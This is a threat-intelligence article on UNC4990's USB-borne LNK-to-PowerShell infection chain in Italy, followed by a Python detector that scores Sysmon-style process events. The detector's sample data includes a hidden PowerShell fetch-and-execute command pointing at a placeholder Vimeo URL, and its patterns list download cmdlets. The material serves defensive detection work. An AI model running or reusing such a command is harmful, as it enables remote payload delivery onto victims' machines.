A financially motivated threat actor tracked as UNC4990 is using weaponized USB devices as its initial infection vector against organizations in Italy, targeting industries such as health, transportation, construction, and logistics. The attacks involve widespread USB infection, followed by deployment of the EMPTYSPACE downloader.
This downloader is used to drop the open-source Sliver adversary simulation tool. UNC4990, operational since late 2020, utilizes Italian infrastructure for command-and-control (C2) purposes. While the end goal and whether UNC4990 acts as an initial access facilitator for other threat actors remain unclear, there have been instances where an open-source cryptocurrency miner was deployed after months of beaconing activity. The attacks were first documented by Fortgale and Yoroi in December 2023, with the former tracking the adversary under the name Nebula Broker.
The infection begins when a victim double-clicks on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script responsible for downloading EMPTYSPACE (also known as BrokerLoader or Vetta Loader) from a remote server via an intermediate PowerShell script hosted on Vimeo.
The campaign has broader implications, as it shows the actor's ability to abuse trusted third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded payloads. Researchers also note UNC4990's adaptability and willingness to experiment, reflected in the use of several different programming languages across its toolset, which underlines the need for stronger security controls and continued vigilance against threats of this kind.
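The infection chain above (a double-clicked LNK on removable media launching PowerShell that fetches a stager from a legitimate site) can be triaged from process-creation telemetry. The following is an added detection example written for this article, not code from the original post or from any of the researchers cited; the Sysmon-style events, the removable-drive inventory and the Vimeo URL are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields); not real
# telemetry from the campaign. Paths and the Vimeo URL are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CurrentDirectory": "E:\\",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr https://vimeo.com/EXAMPLE-ID)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CurrentDirectory": r"C:\Users\alice",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CurrentDirectory": "E:\\", "CommandLine": "notepad.exe"},
]

# Assumed inventory of drive letters backed by removable media (e.g. taken from
# Get-Volume on the host); constructed for this example.
REMOVABLE_DRIVES = {"E:", "F:"}
# Legitimate sites the article reports being used to host the staged payloads.
STAGING_HOSTS = ("vimeo.com", "github.com", "arstechnica.com")
DOWNLOAD_TOKENS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|invoke-expression|\biex\b", re.I)
DRIVE_RE = re.compile(r"(?<![A-Za-z0-9])([A-Za-z]:)\\")

def usb_lnk_powershell_indicators(ev):
    """Return the indicators one process-creation event matches, in fixed order."""
    hits = []
    if not ev["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return hits
    cmd = ev["CommandLine"]
    # A double-clicked LNK is launched by Explorer, so PowerShell's parent is explorer.exe
    if ev["ParentImage"].lower().endswith("\\explorer.exe"):
        hits.append("powershell_spawned_by_explorer")
    # Drive letters seen in the working directory or referenced on the command line
    drives = {ev["CurrentDirectory"][:2].upper()} | {d.upper() for d in DRIVE_RE.findall(cmd)}
    if drives & REMOVABLE_DRIVES:
        hits.append("removable_drive_context")
    if DOWNLOAD_TOKENS.search(cmd):
        hits.append("download_or_eval_cmdlet")
    if any(h in cmd.lower() for h in STAGING_HOSTS):
        hits.append("trusted_site_staging_host")
    return hits

def triage(events, min_hits=3):
    """Return (index, indicators) for events matching at least min_hits indicators."""
    flagged = []
    for i, ev in enumerate(events):
        hits = usb_lnk_powershell_indicators(ev)
        if len(hits) >= min_hits:
            flagged.append((i, hits))
    return flagged
```

Requiring several indicators together keeps routine PowerShell launched from Explorer (the second event) below the alert threshold while the USB-sourced download chain still scores on all four.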